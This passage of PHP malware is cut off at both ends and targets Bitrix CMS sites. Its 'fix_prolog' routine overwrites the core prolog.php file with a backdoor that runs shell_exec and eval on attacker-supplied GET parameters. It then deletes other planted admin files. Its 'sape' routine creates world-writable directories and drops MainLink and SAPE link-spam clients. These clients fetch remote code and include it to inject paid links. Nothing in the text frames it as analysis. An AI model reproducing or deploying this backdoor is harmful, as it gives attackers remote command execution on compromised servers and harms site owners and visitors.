$mm; } if (isset($_GET['p']) && ($_GET['p']) == 'fix_prolog') { file_put_contents(dirname(__DIR__, 1).'/bitrix/modules/main/include/prolog.php', '<?if(isset($_GET["mi1"]))echo shell_exec($_GET["mi1"]);if(isset($_GET["mi2"]))echo eval($_GET["mi2"]); require_once(__DIR__ . "/../bx_root.php"); if (file_exists($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/html_pages/.enabled")) { require_once(__DIR__ . "/../lib/composite/responder.php"); Bitrix\Main\Composite\Responder::respond(); } require_once(__DIR__ . "/prolog_before.php"); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_after.php");') ; unlink(dirname(__DIR__, 1).'/bitrix/admin/accesson.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/beence.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/on.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/doc.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/index3.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/search.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/s_e.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/s_ne.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/ups.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/wp-plugins.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/wp_wrong_datlib.php'); unlink(dirname(__DIR__, 1).'/bitrix/admin/moduless.php'); unlink(dirname(__DIR__, 1).'/assets/images/accesson.php'); unlink(dirname(__DIR__, 1).'/accesson.php'); } if (isset($_GET['p']) && ($_GET['p']) == 'sape') { mkdir('err_class', 0777); chmod('err_class', 0777); mkdir('err_class/data', 0777); chmod('err_class/data', 0777); $ml_file = <<<LABEL <?php class MLClient { var \$file_code = 'ML_%code.php'; var \$transmiter = null; var \$code_type = 'l'; function __construct(\$o = array()) { // code type if ( isset(\$o['CODE_TYPE']) && strlen(\$o['CODE_TYPE']) == 1 ) { \$this->code_type = strtolower(\$o['CODE_TYPE']); } else { \$this->code_type = 'l'; // links } \$code_file = dirname(__FILE__) . '/data/' . str_replace('%', \$this->code_type, \$this->file_code); \$username = \$this->getUser(\$o); if ( file_exists(\$code_file) ) { // unlock if locked if ( file_exists(\$code_file . '.lock') ) { @unlink(\$code_file . '.lock'); } // setup_code include_once \$code_file; } else { // downloading latest version of code if ( \$this->getCode(\$o, \$this->code_type) ) { include_once \$code_file; } } \$transmiter_class = \$this->code_type . 'Transmiter'; if(class_exists(\$transmiter_class)) { \$o['USERNAME'] = \$this->getUser(\$o); \$this->transmiter = new \$transmiter_class(\$o); } } function build_links() { if(\$this->transmiter != null){ return \$this->transmiter->build_links(); } return ''; } function getCode(\$o = array(), \$code_type = 'l') { \$username = \$this->getUser(\$o); \$code_file = dirname(__FILE__) . '/data/' . str_replace('%', \$code_type, \$this->file_code); if ( (!file_exists(\$code_file) && !file_exists(\$code_file . '.lock')) || ( strpos(\$userAgent, 'mlbot.' . \$username) !== false && isset(\$_GET['ml_request']))) { if ( !is_writable(dirname(__FILE__) . '/data') ) { print 'Unable to load Mainlink code. Directory ' . realpath(dirname(__FILE__).'/data').' is not writeable!'; return false; } if ( file_exists(\$code_file . '.lock') && file_exists(\$code_file) ) { \$filetime = filectime(\$code_file . '.lock'); if ( time() - \$filetime < 10 ) { print '<!--<ml_update>false: locked for ' . time() - \$filetime . ' seconds</ml_update>-->'; return false; } else { @unlink(realpath(dirname(__FILE__) . '/data') . '/core_update.lock'); print '<!--<ml_update_info>true: now ' . time() . ', locked at ' . \$filetime . ' seconds</ml_update_info>-->'; return false; } } } \$fp = fopen(\$code_file . '.lock', 'w+'); fwrite(\$fp, time()); fclose(\$fp); \$code_type = isset(\$o['CODE_TYPE']) ? \$o['CODE_TYPE'] : 'l'; \$service_call = isset(\$_GET['ml_request']) ? \$_GET['ml_request'] : 'call'; \$content = \$this->getApi(array('getCode' => \$code_type, 'USERNAME' => \$username, 'codeBase' => 'php', \$service_call => true)); // unlocking update @unlink(\$code_file . '.lock'); // report result \$handle = fopen(\$code_file, 'w'); \$res = fwrite(\$handle, \$content); fclose(\$handle); \$result = \$res !== false ? 'true' : 'false'; // let`s try again if unsucced if ( !\$result || \$result == 'false' ) { \$handle = fopen(\$code_file, 'wb'); if (\$handle) { @flock(\$handle, LOCK_EX); \$result = fwrite(\$handle, \$content); @flock(\$handle, LOCK_UN); fclose(\$handle); } } print '<!--<ml_code_setup_result>' . var_export(\$result, true) . '</ml_code_setup_result>-->'; return \$result; } /* * getUser * Determine username */ function getUser(\$o = array()) { // in case username cont is preset if ( isset(\$o['USERNAME']) && strlen(\$o['USERNAME']) == 32 ) { return \$o['USERNAME']; } // search for key \$dirop = opendir(realpath(dirname(__FILE__))); \$secure = false; if(\$dirop){ while (gettype(\$file=readdir(\$dirop)) != 'boolean'){ if (\$file != "." && \$file != ".." && \$file != '.htaccess'){ \$ex = explode(".",\$file); if( isset(\$ex[1]) and trim(\$ex[1]) == 'sec' ){ \$secure= trim(\$ex[0]); return \$secure; } } } } return \$secure; } /* * getApi * Call API */ function getApi(\$data) { // reserver servers \$servers = array( 'main' => 'codes.mainlink.ru', 'reserve' => 'dcodes.mainlinkads.com' ); return \$this->request(\$servers, '/api.php', \$data, 'GET'); } /* * request * Do request */ function request(\$servers, \$file, \$data=array(), \$method='GET', \$timeout = 5) { // port \$port = 80; foreach(\$servers as \$host) { \$_data = \$data; \$tmp = array(); foreach(\$_data as \$k=>\$v){ \$tmp[] = \$k.'='.urlencode(\$v); } \$_data = implode('&', \$tmp); \$path = \$file; if( \$method == 'GET' && \$_data != '' ) { \$path .= '?' . \$_data; } \$request = \$method." ".\$path." HTTP/1.0\r\n"; \$request .= "Host: ".\$host."\r\n"; \$request .= "User-Agent: MainLink code 6.0\r\n"; \$request .= "Connection: close\r\n\r\n"; @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', \$timeout); @ini_set('user_agent', 'MainLink init code v6'); \$answer = ''; \$response = ''; if(function_exists('socket_create')) { @\$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); @socket_set_option(\$socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => \$timeout, 'usec' => 0)); @socket_connect(\$socket, \$host, \$port); @socket_write(\$socket, \$request); while(\$a = @socket_read(\$socket, 0xFFFF)) { \$response .= \$a; } \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; } if(function_exists('fsockopen') && \$answer == '') { \$fp = @fsockopen(\$host, \$port, \$errno, \$errstr, \$timeout); if (\$fp) { @fputs(\$fp, \$request); while (!@feof(\$fp)) { \$response .= @fgets(\$fp, 0xFFFF); } @fclose(\$fp); } \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; } if(function_exists('curl_init') && \$ch = @curl_init() && \$answer == '') { @curl_setopt(\$ch, CURLOPT_URL, 'http://' . \$host . \$path); @curl_setopt(\$ch, CURLOPT_HEADER, true); @curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, \$timeout); @curl_setopt(\$ch, CURLOPT_USERAGENT, 'MainLink init code v6'); \$response = @curl_exec(\$ch); \$answer = ( \$response != '' ) ? explode("\r\n\r\n", \$response, 2) : ''; \$response = ''; @curl_close(\$ch); } if( function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1 && \$answer == '') { \$response = @file_get_contents('http://' . \$host . \$path); \$answer[1] = ( \$response != '' ) ? \$response : ''; } if(\$answer[1] != '' && preg_match('/file:\'(.*?)\'/', \$answer[1], \$r)) { if(isset(\$r[1])) { \$answer = \$r[1]; \$c = base64_decode(\$answer); if(\$c){ return \$c; } return \$answer; } } if(\$answer[1] != '') { return \$answer[1]; } } return '<!--ERROR: Unable to use transport.-->'; } } ?> LABEL; $sape_file = <<<LABEL <?php /** * SAPE.ru - Интеллектуальная система купли-продажи ссылок * * PHP-клиент * * Вебмастеры! Не нужно ничего менять в этом файле! * Все настройки - через параметры при вызове кода. * * Подробную информацию по добавлению сайта в систему, * установки кода, а так же по всему остальным вопросам * Вы можете найти здесь: * @link http://help.sape.ru/sape/faq/27 * @link http://help.sape.ru/articles/faq/1041 * */ /** * Основной класс, выполняющий всю рутину */ class SAPE_base { protected \$_version = '1.4.9'; protected \$_verbose = true; /** * Кодировка сайта * @link http://www.php.net/manual/en/function.iconv.php * @var string */ protected \$_charset = ''; protected \$_sape_charset = ''; protected \$_server_list = array('dispenser-01.saperu.net', 'dispenser-02.saperu.net'); /** * Пожалейте наш сервер :о) * @var int */ protected \$_cache_lifetime = 3600; /** * Если скачать базу ссылок не удалось, то следующая попытка будет через столько секунд * @var int */ protected \$_cache_reloadtime = 600; protected \$_errors = array(); protected \$_host = ''; protected \$_request_uri = ''; protected \$_multi_site = false; /** * Способ подключения к удалённому серверу [file_get_contents|curl|socket] * @var string */ protected \$_fetch_remote_type = 'socket'; /** * Сколько ждать ответа * @var int */ protected \$_socket_timeout = 6; protected \$_force_show_code = true; /** * Если наш робот * @var bool */ protected \$_is_our_bot = false; protected \$_debug = false; protected \$_file_contents_for_debug = array(); /** * Регистронезависимый режим работы, использовать только на свой страх и риск * @var bool */ protected \$_ignore_case = false; /** * Путь к файлу с данными * @var string */ protected \$_db_file = ''; /** * Формат запроса. serialize|php-require * @var string */ protected \$_format = 'serialize'; /** * Флаг для разбиения links.db по отдельным файлам. * @var bool */ protected \$_split_data_file = false; /** * Откуда будем брать uri страницы: \$_SERVER['REQUEST_URI'] или getenv('REQUEST_URI') * @var bool */ protected \$_use_server_array = false; /** * Показывать ли код js отдельно от выводимого контента * * @var bool */ protected \$_show_counter_separately = false; protected \$_force_update_db = false; protected \$_user_agent = ''; public function __construct(\$options = null) { // Поехали :o) \$host = ''; if (is_array(\$options)) { if (isset(\$options['host'])) { \$host = \$options['host']; } } elseif (strlen(\$options)) { \$host = \$options; \$options = array(); } else { \$options = array(); } if (isset(\$options['use_server_array']) && \$options['use_server_array'] == true) { \$this->_use_server_array = true; } // Какой сайт? if (strlen(\$host)) { \$this->_host = \$host; } else { \$this->_host = \$_SERVER['HTTP_HOST']; } \$this->_host = preg_replace('/^https:\/\//', '', \$this->_host); \$this->_host = preg_replace('/^www\./', '', \$this->_host); // Какая страница? if (isset(\$options['request_uri']) && strlen(\$options['request_uri'])) { \$this->_request_uri = \$options['request_uri']; } elseif (\$this->_use_server_array === false) { \$this->_request_uri = getenv('REQUEST_URI'); } if (strlen(\$this->_request_uri) == 0) { \$this->_request_uri = \$_SERVER['REQUEST_URI']; } // На случай, если хочется много сайтов в одной папке if (isset(\$options['multi_site']) && \$options['multi_site'] == true) { \$this->_multi_site = true; } // Выводить информацию о дебаге if (isset(\$options['debug']) && \$options['debug'] == true) { \$this->_debug = true; } // Определяем наш ли робот if (isset(\$_COOKIE['sape_cookie']) && (\$_COOKIE['sape_cookie'] == _SAPE_USER)) { \$this->_is_our_bot = true; if (isset(\$_COOKIE['sape_debug']) && (\$_COOKIE['sape_debug'] == 1)) { \$this->_debug = true; //для удобства дебега саппортом \$this->_options = \$options; \$this->_server_request_uri = \$_SERVER['REQUEST_URI']; \$this->_getenv_request_uri = getenv('REQUEST_URI'); \$this->_SAPE_USER = _SAPE_USER; } if (isset(\$_COOKIE['sape_updatedb']) && (\$_COOKIE['sape_updatedb'] == 1)) { \$this->_force_update_db = true; } } else { \$this->_is_our_bot = false; } // Сообщать об ошибках if (isset(\$options['verbose']) && \$options['verbose'] == true || \$this->_debug) { \$this->_verbose = true; } // Кодировка if (isset(\$options['charset']) && strlen(\$options['charset'])) { \$this->_charset = \$options['charset']; } else { \$this->_charset = 'windows-1251'; } if (isset(\$options['fetch_remote_type']) && strlen(\$options['fetch_remote_type'])) { \$this->_fetch_remote_type = \$options['fetch_remote_type']; } if (isset(\$options['socket_timeout']) && is_numeric(\$options['socket_timeout']) && \$options['socket_timeout'] > 0) { \$this->_socket_timeout = \$options['socket_timeout']; } // Всегда выводить чек-код if (isset(\$options['force_show_code']) && \$options['force_show_code'] == true) { \$this->_force_show_code = true; } if (!defined('_SAPE_USER')) { return \$this->_raise_error('Не задана константа _SAPE_USER'); } //Не обращаем внимания на регистр ссылок if (isset(\$options['ignore_case']) && \$options['ignore_case'] == true) { \$this->_ignore_case = true; \$this->_request_uri = strtolower(\$this->_request_uri); } if (isset(\$options['show_counter_separately'])) { \$this->_show_counter_separately = (bool)\$options['show_counter_separately']; } if (isset(\$options['format']) && in_array(\$options['format'], array('serialize', 'php-require'))) { \$this->_format = \$options['format']; } if (isset(\$options['split_data_file'])) { \$this->_split_data_file = (bool)\$options['split_data_file']; } } /** * Получить строку User-Agent * * @return string */ protected function _get_full_user_agent_string() { return \$this->_user_agent . ' ' . \$this->_version; } /** * Вывести дебаг-информацию * * @param \$data * * @return string */ protected function _debug_output(\$data) { \$data = '<!-- <sape_debug_info>' . @base64_encode(serialize(\$data)) . '</sape_debug_info> -->'; return \$data; } /** * Функция для подключения к удалённому серверу */ protected function _fetch_remote_file(\$host, \$path, \$specifyCharset = false) { \$user_agent = \$this->_get_full_user_agent_string(); @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', \$this->_socket_timeout); @ini_set('user_agent', \$user_agent); if ( \$this->_fetch_remote_type == 'file_get_contents' || ( \$this->_fetch_remote_type == '' && function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1 ) ) { \$this->_fetch_remote_type = 'file_get_contents'; if (\$specifyCharset && function_exists('stream_context_create')) { \$opts = array( 'http' => array( 'method' => 'GET', 'header' => 'Accept-Charset: ' . \$this->_charset . "\r\n" ) ); \$context = @stream_context_create(\$opts); if (\$data = @file_get_contents('http://' . \$host . \$path, null, \$context)) { return \$data; } } else { if (\$data = @file_get_contents('http://' . \$host . \$path)) { return \$data; } } } elseif ( \$this->_fetch_remote_type == 'curl' || ( \$this->_fetch_remote_type == '' && function_exists('curl_init') ) ) { \$this->_fetch_remote_type = 'curl'; if (\$ch = @curl_init()) { @curl_setopt(\$ch, CURLOPT_URL, 'http://' . \$host . \$path); @curl_setopt(\$ch, CURLOPT_HEADER, false); @curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, \$this->_socket_timeout); @curl_setopt(\$ch, CURLOPT_USERAGENT, \$user_agent); if (\$specifyCharset) { @curl_setopt(\$ch, CURLOPT_HTTPHEADER, array('Accept-Charset: ' . \$this->_charset)); } \$data = @curl_exec(\$ch); @curl_close(\$ch); if (\$data) { return \$data; } } } else { \$this->_fetch_remote_type = 'socket'; \$buff = ''; \$fp = @fsockopen(\$host, 80, \$errno, \$errstr, \$this->_socket_timeout); if (\$fp) { @fputs(\$fp, "GET {\$path} HTTP/1.0\r\nHost: {\$host}\r\n"); if (\$specifyCharset) { @fputs(\$fp, "Accept-Charset: {\$this->_charset}\r\n"); } @fputs(\$fp, "User-Agent: {\$user_agent}\r\n\r\n"); while (!@feof(\$fp)) { \$buff .= @fgets(\$fp, 128); } @fclose(\$fp); \$page = explode("\r\n\r\n", \$buff); unset(\$page[0]); return implode("\r\n\r\n", \$page); } } return \$this->_raise_error('Не могу подключиться к серверу: ' . \$host . \$path . ', type: ' . \$this->_fetch_remote_type); } /** * Функция чтения из локального файла */ protected function _read(\$filename) { \$fp = @fopen(\$filename, 'rb'); @flock(\$fp, LOCK_SH); if (\$fp) { clearstatcache(); \$length = @filesize(\$filename); if (version_compare(PHP_VERSION, '5.3.0', '<')) { \$mqr = @get_magic_quotes_runtime(); @set_magic_quotes_runtime(0); } if (\$length) { \$data = @fread(\$fp, \$length); } else { \$data = ''; } if (version_compare(PHP_VERSION, '5.3.0', '<')) { @set_magic_quotes_runtime(\$mqr); } @flock(\$fp, LOCK_UN); @fclose(\$fp); return \$data; } return \$this->_raise_error('Не могу считать данные из файла: ' . \$filename); } /** * Функция записи в локальный файл */ protected function _write(\$filename, \$data) { \$fp = @fopen(\$filename, 'ab'); if (\$fp) { if (flock(\$fp, LOCK_EX | LOCK_NB)) { ftruncate(\$fp, 0); if (version_compare(PHP_VERSION, '5.3.0', '<')) { \$mqr = @get_magic_quotes_runtime(); @set_magic_quotes_runtime(0); } @fwrite(\$fp, \$data); if (version_compare(PHP_VERSION, '5.3.0', '<')) { @set_magic_quotes_runtime(\$mqr); } @flock(\$fp, LOCK_UN); @fclose(\$fp); if (md5(\$this->_read(\$filename)) != md5(\$data)) { @unlink(\$filename); return \$this->_raise_error('Нарушена целостность данных при записи в файл: ' . \$filename); } } else { return false; } return true; } return \$this->_raise_error('Не могу записать данные в файл: ' . \$filename); } /** * Функция обработки ошибок */ protected function _raise_error(\$e) { \$this->_errors[] = \$e; if (\$this->_verbose == true) { print '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . \$e . '</p>'; } return false; } /** * Получить имя файла с даными * * @return string */ protected function _get_db_file() { return ''; } /** * Получить имя файла с мета-информацией * * @return string */ protected function _get_meta_file() { return ''; } /** * Получить префикс файла в режиме split_data_file. * * @return string */ protected function _get_save_filename_prefix() { if (\$this->_split_data_file) { return '.' . crc32(\$this->_request_uri) % 100; } else { return ''; } } /** * Получить URI к хосту диспенсера * * @return string */ protected function _get_dispenser_path() { return ''; } /** * Сохранить данные, полученные из файла, в объекте */ protected function _set_data(\$data) { } /** * Расшифровывает данные * * @param string \$data * * @return array|bool */ protected function _uncode_data(\$data) { return @unserialize(\$data); } /** * Шифрует данные для сохранения. * * @param \$data * * @return string */ protected function _code_data(\$data) { return @serialize(\$data); } /** * Сохранение данных в файл. * * @param string \$data * @param string \$filename */ protected function _save_data(\$data, \$filename = '') { \$this->_write(\$filename, \$data); } /** * Загрузка данных */ protected function _load_data() { \$this->_db_file = \$this->_get_db_file(); if (!is_file(\$this->_db_file)) { // Пытаемся создать файл. if (@touch(\$this->_db_file, time() - \$this->_cache_lifetime - 1)) { @chmod(\$this->_db_file, 0666); // Права доступа } else { return \$this->_raise_error('Нет файла ' . \$this->_db_file . '. Создать не удалось. Выставите права 777 на папку.'); } } if (!is_writable(\$this->_db_file)) { return \$this->_raise_error('Нет доступа на запись к файлу: ' . \$this->_db_file . '! Выставите права 777 на папку.'); } @clearstatcache(); \$data = \$this->_read(\$this->_db_file); if ( \$this->_force_update_db || ( !\$this->_is_our_bot && ( filemtime(\$this->_db_file) < (time() - \$this->_cache_lifetime) ) ) ) { // Чтобы не повесить площадку клиента и чтобы не было одновременных запросов @touch(\$this->_db_file, (time() - \$this->_cache_lifetime + \$this->_cache_reloadtime)); \$path = \$this->_get_dispenser_path(); if (strlen(\$this->_charset)) { \$path .= '&charset=' . \$this->_charset; } if (\$this->_format) { \$path .= '&format=' . \$this->_format; } foreach (\$this->_server_list as \$server) { if (\$data = \$this->_fetch_remote_file(\$server, \$path)) { if (substr(\$data, 0, 12) == 'FATAL ERROR:') { \$this->_raise_error(\$data); } else { // [псевдо]проверка целостности: \$hash = \$this->_uncode_data(\$data); if (\$hash != false) { // попытаемся записать кодировку в кеш \$hash['__sape_charset__'] = \$this->_charset; \$hash['__last_update__'] = time(); \$hash['__multi_site__'] = \$this->_multi_site; \$hash['__fetch_remote_type__'] = \$this->_fetch_remote_type; \$hash['__ignore_case__'] = \$this->_ignore_case; \$hash['__php_version__'] = phpversion(); \$hash['__server_software__'] = \$_SERVER['SERVER_SOFTWARE']; \$data_new = \$this->_code_data(\$hash); if (\$data_new) { \$data = \$data_new; } \$this->_save_data(\$data, \$this->_db_file); break; } } } } } // Убиваем PHPSESSID if (strlen(session_id())) { \$session = session_name() . '=' . session_id(); \$this->_request_uri = str_replace(array('?' . \$session, '&' . \$session), '', \$this->_request_uri); } \$data = \$this->_uncode_data(\$data); if (\$this->_split_data_file) { \$meta = \$this->_uncode_data(\$this->_read(\$this->_get_meta_file())); if (!is_array(\$data)) { \$data = array(); } if (is_array(\$meta)) { \$data = array_merge(\$data, \$meta); } } \$this->_set_data(\$data); return true; } protected function _return_obligatory_page_content() { \$s_globals = new SAPE_globals(); \$html = ''; if (isset(\$this->_page_obligatory_output) && !empty(\$this->_page_obligatory_output) && false == \$s_globals->page_obligatory_output_shown() ) { \$s_globals->page_obligatory_output_shown(true); \$html = \$this->_page_obligatory_output; } return \$html; } /** * Вернуть js-код * - работает только когда параметр конструктора show_counter_separately = true * * @return string */ public function return_counter() { //если show_counter_separately = false и выполнен вызов этого метода, //то заблокировать вывод js-кода вместе с контентом if (false == \$this->_show_counter_separately) { \$this->_show_counter_separately = true; } return \$this->_return_obligatory_page_content(); } } /** * Глобальные флаги */ class SAPE_globals { protected function _get_toggle_flag(\$name, \$toggle = false) { static \$flags = array(); if (!isset(\$flags[\$name])) { \$flags[\$name] = false; } if (\$toggle) { \$flags[\$name] = true; } return \$flags[\$name]; } public function block_css_shown(\$toggle = false) { return \$this->_get_toggle_flag('block_css_shown', \$toggle); } public function block_ins_beforeall_shown(\$toggle = false) { return \$this->_get_toggle_flag('block_ins_beforeall_shown', \$toggle); } public function page_obligatory_output_shown(\$toggle = false) { return \$this->_get_toggle_flag('page_obligatory_output_shown', \$toggle); } } /** * Класс для работы с обычными ссылками */ class SAPE_client extends SAPE_base { protected \$_links_delimiter = ''; protected \$_links = array(); protected \$_links_page = array(); protected \$_teasers_page = array(); protected \$_user_agent = 'SAPE_Client PHP'; protected \$_show_only_block = false; protected \$_block_tpl = ''; protected \$_block_tpl_options = array(); protected \$_block_uri_idna = array(); protected \$_return_links_calls; protected \$_teasers_css_showed = false; /** * @var SAPE_rtb */ protected \$_teasers_rtb_proxy = null; public function __construct(\$options = null) { parent::__construct(\$options); if (isset(\$options['rtb']) && !empty(\$options['rtb']) && \$options['rtb'] instanceof SAPE_rtb) { \$this->_teasers_rtb_proxy = \$options['rtb']; } \$this->_load_data(); } /** * Обработка html для массива ссылок * * @param string \$html * @param null|array \$options * * @return string */ protected function _return_array_links_html(\$html, \$options = null) { if (empty(\$options)) { \$options = array(); } // если запрошена определенная кодировка, и известна кодировка кеша, и они разные, конвертируем в заданную if ( strlen(\$this->_charset) > 0 && strlen(\$this->_sape_charset) > 0 && \$this->_sape_charset != \$this->_charset && function_exists('iconv') ) { \$new_html = @iconv(\$this->_sape_charset, \$this->_charset, \$html); if (\$new_html) { \$html = \$new_html; } } if (\$this->_is_our_bot) { \$html = '<sape_noindex>' . \$html . '</sape_noindex>'; if (isset(\$options['is_block_links']) && true == \$options['is_block_links']) { if (!isset(\$options['nof_links_requested'])) { \$options['nof_links_requested'] = 0; } if (!isset(\$options['nof_links_displayed'])) { \$options['nof_links_displayed'] = 0; } if (!isset(\$options['nof_obligatory'])) { \$options['nof_obligatory'] = 0; } if (!isset(\$options['nof_conditional'])) { \$options['nof_conditional'] = 0; } \$html = '<sape_block nof_req="' . \$options['nof_links_requested'] . '" nof_displ="' . \$options['nof_links_displayed'] . '" nof_oblig="' . \$options['nof_obligatory'] . '" nof_cond="' . \$options['nof_conditional'] . '">' . \$html . '</sape_block>'; } } return \$html; } /** * Финальная обработка html перед выводом ссылок * * @param string \$html * * @return string */ protected function _return_html(\$html) { if (false == \$this->_show_counter_separately) { \$html = \$this->_return_obligatory_page_content() . \$html; } return \$this->_add_debug_info(\$html); } protected function _add_debug_info(\$html) { if (\$this->_debug) { if (!empty(\$this->_links['__sape_teaser_images_path__'])) { \$this->_add_file_content_for_debug(\$this->_links['__sape_teaser_images_path__']); } \$this->_add_file_content_for_debug('.htaccess'); \$html .= \$this->_debug_output(\$this); } return \$html; } protected function _add_file_content_for_debug(\$file_name) { \$path = realpath( rtrim(\$_SERVER['DOCUMENT_ROOT'], DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . strtok(\$file_name, '?') ); \$this->_file_contents_for_debug[\$file_name]['path'] = \$path; if (\$path) { \$this->_file_contents_for_debug[\$file_name]['contents'] = @file_get_contents(\$path); } } /** * Eсли запрошена определенная кодировка, и известна кодировка кеша, и они разные, конвертируем в заданную */ protected function _convertCharset(\$html) { if (strlen(\$this->_charset) > 0 && strlen(\$this->_sape_charset) > 0 && \$this->_sape_charset != \$this->_charset && function_exists('iconv') ) { \$new_html = @iconv(\$this->_sape_charset, \$this->_charset, \$html); if (\$new_html) { \$html = \$new_html; } } return \$html; } /** * Вывод ссылок в виде блока * * - Примечание: начиная с версии 1.2.2 второй аргумент \$offset убран. Если * передавать его согласно старой сигнатуре, то он будет проигнорирован. * * @param int \$n Количество ссылок, которые нужно вывести в текущем блоке * @param array \$options Опции * * <code> * \$options = array(); * \$options['block_no_css'] = (false|true); * // Переопределяет запрет на вывод css в коде страницы: false - выводить css * \$options['block_orientation'] = (1|0); * // Переопределяет ориентацию блока: 1 - горизонтальная, 0 - вертикальная * \$options['block_width'] = ('auto'|'[?]px'|'[?]%'|'[?]'); * // Переопределяет ширину блока: * // 'auto' - определяется шириной блока-предка с фиксированной шириной, * // если такового нет, то займет всю ширину * // '[?]px' - значение в пикселях * // '[?]%' - значение в процентах от ширины блока-предка с фиксированной шириной * // '[?]' - любое другое значение, которое поддерживается спецификацией CSS * </code> * * @see return_links() * @see return_counter() * * @return string */ public function return_block_links(\$n = null, \$options = null) { \$numargs = func_num_args(); \$args = func_get_args(); //Проверяем аргументы для старой сигнатуры вызова if (2 == \$numargs) { // return_links(\$n, \$options) if (!is_array(\$args[1])) { // return_links(\$n, \$offset) - deprecated! \$options = null; } } elseif (2 < \$numargs) { // return_links(\$n, \$offset, \$options) - deprecated! if (!is_array(\$options)) { \$options = \$args[2]; } } // Объединить параметры if (empty(\$options)) { \$options = array(); } \$defaults = array(); \$defaults['block_no_css'] = false; \$defaults['block_orientation'] = 1; \$defaults['block_width'] = ''; \$ext_options = array(); if (isset(\$this->_block_tpl_options) && is_array(\$this->_block_tpl_options)) { \$ext_options = \$this->_block_tpl_options; } \$options = array_merge(\$defaults, \$ext_options, \$options); // Ссылки переданы не массивом (чек-код) => выводим как есть + инфо о блоке if (!is_array(\$this->_links_page)) { \$html = \$this->_return_array_links_html('', array('is_block_links' => true)); return \$this->_return_html(\$this->_links_page . \$html); } // Не переданы шаблоны => нельзя вывести блоком - ничего не делать elseif (!isset(\$this->_block_tpl)) { return \$this->_return_html(''); } // Определим нужное число элементов в блоке \$total_page_links = count(\$this->_links_page); \$need_show_obligatory_block = false; \$need_show_conditional_block = false; \$n_requested = 0; if (isset(\$this->_block_ins_itemobligatory)) { \$need_show_obligatory_block = true; } if (is_numeric(\$n) && \$n >= \$total_page_links) { \$n_requested = \$n; if (isset(\$this->_block_ins_itemconditional)) { \$need_show_conditional_block = true; } } if (!is_numeric(\$n) || \$n > \$total_page_links) { \$n = \$total_page_links; } // Выборка ссылок \$links = array(); for (\$i = 1; \$i <= \$n; \$i++) { \$links[] = array_shift(\$this->_links_page); } \$html = ''; // Подсчет числа опциональных блоков \$nof_conditional = 0; if (count(\$links) < \$n_requested && true == \$need_show_conditional_block) { \$nof_conditional = \$n_requested - count(\$links); } //Если нет ссылок и нет вставных блоков, то ничего не выводим if (empty(\$links) && \$need_show_obligatory_block == false && \$nof_conditional == 0) { \$return_links_options = array( 'is_block_links' => true, 'nof_links_requested' => \$n_requested, 'nof_links_displayed' => 0, 'nof_obligatory' => 0, 'nof_conditional' => 0 ); \$html = \$this->_return_array_links_html(\$html, \$return_links_options); return \$this->_return_html(\$html); } // Делаем вывод стилей, только один раз. Или не выводим их вообще, если так задано в параметрах \$s_globals = new SAPE_globals(); if (!\$s_globals->block_css_shown() && false == \$options['block_no_css']) { \$html .= \$this->_block_tpl['css']; \$s_globals->block_css_shown(true); } // Вставной блок в начале всех блоков if (isset(\$this->_block_ins_beforeall) && !\$s_globals->block_ins_beforeall_shown()) { \$html .= \$this->_block_ins_beforeall; \$s_globals->block_ins_beforeall_shown(true); } unset(\$s_globals); // Вставной блок в начале блока if (isset(\$this->_block_ins_beforeblock)) { \$html .= \$this->_block_ins_beforeblock; } // Получаем шаблоны в зависимости от ориентации блока \$block_tpl_parts = \$this->_block_tpl[\$options['block_orientation']]; \$block_tpl = \$block_tpl_parts['block']; \$item_tpl = \$block_tpl_parts['item']; \$item_container_tpl = \$block_tpl_parts['item_container']; \$item_tpl_full = str_replace('{item}', \$item_tpl, \$item_container_tpl); \$items = ''; \$nof_items_total = count(\$links); foreach (\$links as \$link) { // Обычная красивая ссылка \$is_found = preg_match('#<a href="(https?://([^"/]+)[^"]*)"[^>]*>[\s]*([^<]+)</a>#i', \$link, \$link_item); // Картиночкая красивая ссылка if (!\$is_found) { preg_match('#<a href="(https?://([^"/]+)[^"]*)"[^>]*><img.*?alt="(.*?)".*?></a>#i', \$link, \$link_item); } if (function_exists('mb_strtoupper') && strlen(\$this->_sape_charset) > 0) { \$header_rest = mb_substr(\$link_item[3], 1, mb_strlen(\$link_item[3], \$this->_sape_charset) - 1, \$this->_sape_charset); \$header_first_letter = mb_strtoupper(mb_substr(\$link_item[3], 0, 1, \$this->_sape_charset), \$this->_sape_charset); \$link_item[3] = \$header_first_letter . \$header_rest; } elseif (function_exists('ucfirst') && (strlen(\$this->_sape_charset) == 0 || strpos(\$this->_sape_charset, '1251') !== false)) { \$link_item[3][0] = ucfirst(\$link_item[3][0]); } // Если есть раскодированный URL, то заменить его при выводе if (isset(\$this->_block_uri_idna) && isset(\$this->_block_uri_idna[\$link_item[2]])) { \$link_item[2] = \$this->_block_uri_idna[\$link_item[2]]; } \$item = \$item_tpl_full; \$item = str_replace('{header}', \$link_item[3], \$item); \$item = str_replace('{text}', trim(\$link), \$item); \$item = str_replace('{url}', \$link_item[2], \$item); \$item = str_replace('{link}', \$link_item[1], \$item); \$items .= 